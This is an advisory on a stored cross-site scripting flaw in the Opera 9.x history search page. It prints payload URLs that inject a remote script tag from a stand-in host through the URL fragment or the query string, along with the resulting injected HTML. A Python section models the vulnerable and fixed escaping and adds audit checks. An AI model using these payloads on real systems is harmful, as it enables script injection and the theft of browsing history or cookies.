The Opera browser is vulnerable to stored Cross Site Scripting. An attacker is able to inject arbitrary content into the browser through websites visited with Opera. The injected code is rendered in the Opera History Search page, which displays the URL and a short description of each visited page.
* Opera version 9.60 and prior
Opera.exe imports Opera.dll, which handles most of the browser functionality. Whenever a user visits a page, the URL and part of the content of the visited page are saved and compressed in a file named md.dat. In a standard Windows Opera installation, md.dat can be found at the following path:
c:\Documents and Settings\user\Local Settings\Application Data\Opera\Opera\profile\vps\0000\md.dat
The vulnerability lies in the way the URL and the content of visited pages are stored in, and rendered from, the md.dat file.
Opera History Search Page Generation:
The user visits a new site. When the user closes the Opera browser, the file md.dat is updated: Opera appends a block of 2000 bytes for each site visited. The site URL and title are extracted and written in clear text at the beginning of the 2000-byte block. The preview content that appears on the opera:historysearch page for the site is compressed into md.dat. However, HTML encoding is not applied consistently across the parts of the URL, and injection is possible in the optional fragment of the URL (the part after the # character).
The following sequence summarises an attack scenario:
1. User visits http://aaa.com/index.htm#<script src=http://badsite/bad.js></script>
2. The URL and preview content are stored in the history search data. However, the optional fragment after the # character is not encoded properly.
3. If the user later opens the history search page, the injected script is rendered in the user's browser context.
Opera History Search Page Rendering:
When the History Search page is accessed, Opera reads the md.dat file again. Its content is decompressed into a buffer, which is then used to generate a cache file containing the HTML code of the history search page. The cache file is located at a path such as:
c:\Documents and Settings\user\Local Settings\Application Data\Opera\Opera\profile\cache4\opr000EA
Opera then reads the content of the cache file to display the history search page. In this HTML code, the optional fragment of each visited page's URL is not escaped.
Opera History/Cookie Exposed - Exploit Description:
The victim visits the site xxx/1.html and clicks on the link. The 1.html source code:
for (x in document.links)
Opera History Cross Site Scripting and Cross Site Request Forgery:
This is the HTML source code of the opera:historysearch?q=* page following the injection (the injected script tag appears unescaped in both the link href and the cite element):
<h2><a href="http://xxx/2.html#<script src=http://xxx/a.js></script>">(null)</a></h2>
<p>This is a proof of concept. </p>
<cite><ins>10/9/2008 12:39:16 AM</ins> - http://xxx/2.html#<script src=http://xxx/a.js></script></cite>
Note that in Opera 9.52, injection is also possible in other locations, for example in the query string:
URL: http://xxx/2.html?a="><script src=http://xxx/a.js</script>
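The defect described in the rendering section, and the 9.52 query-string variant just above, both come down to escaping only part of a URL before placing it in HTML. The following added example (not Opera's code) models the flawed generation beside the correct one and includes a check a defender could run over stored history URLs; the entry values are constructed from the URLs quoted in this advisory.

```python
import html
from urllib.parse import urlsplit

# Constructed sample history entries (url, title, timestamp), modelled on the
# advisory's URLs; these are test values, not data read from md.dat.
SAMPLE_ENTRIES = [
    ("http://xxx/2.html#<script src=http://xxx/a.js></script>", "(null)", "10/9/2008 12:39:16 AM"),
    ('http://xxx/2.html?a="><script src=http://xxx/a.js</script>', "(null)", "10/9/2008 12:39:17 AM"),
    ("http://aaa.com/index.htm", "Example page", "10/9/2008 12:40:00 AM"),
]

UNSAFE_CHARS = set('<>"\'')


def render_entry_vulnerable(url, title, ts):
    """Models the flaw: only scheme, host and path are HTML-escaped;
    the query and fragment are appended to the page verbatim."""
    parts = urlsplit(url)
    shown = html.escape(f"{parts.scheme}://{parts.netloc}{parts.path}", quote=True)
    if parts.query:
        shown += "?" + parts.query          # raw, not escaped
    if parts.fragment:
        shown += "#" + parts.fragment       # raw, not escaped
    return (f'<h2><a href="{shown}">{html.escape(title, quote=True)}</a></h2>\n'
            f'<cite><ins>{html.escape(ts, quote=True)}</ins> - {shown}</cite>')


def render_entry_fixed(url, title, ts):
    """Correct generation: the whole URL string is escaped as one unit,
    so <, >, " and ' in any component become entities."""
    shown = html.escape(url, quote=True)
    return (f'<h2><a href="{shown}">{html.escape(title, quote=True)}</a></h2>\n'
            f'<cite><ins>{html.escape(ts, quote=True)}</ins> - {shown}</cite>')


def unsafe_components(url):
    """Audit helper: names the URL components (path, query, fragment) that
    carry characters which must be escaped before they reach HTML."""
    parts = urlsplit(url)
    return [name for name, value in (("path", parts.path), ("query", parts.query),
                                     ("fragment", parts.fragment))
            if any(c in UNSAFE_CHARS for c in value)]


def contains_markup(rendered):
    """True when a generated history entry contains a live <script> tag."""
    return "<script" in rendered.lower()
```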